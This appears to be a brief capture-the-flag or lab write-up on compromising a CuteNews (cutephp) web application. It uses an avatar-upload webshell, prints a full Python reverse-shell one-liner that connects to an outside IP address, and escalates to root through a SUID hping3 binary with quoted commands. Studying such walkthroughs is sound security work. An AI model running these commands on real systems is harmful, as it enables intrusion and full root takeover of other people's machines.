http

cutephp

Apache HTTP Server Version 2.4 Documentation

Exploit found https://www.exploit-db.com/exploits/48800

I was able to register the account by looking at the source code, visiting the CAPTCHA link which gave me an access to change the Avata image.

Following the exploit, I was able to create a webshell.

Code Execution found.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.140",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Got a reverse shell:

suid hping3

I ran it

SUID

If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.

This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.

  • sudo install -m =xs $(which hping3) .
    
    ./hping3
    /bin/sh -p

I ran the second option and got the root!

Last updated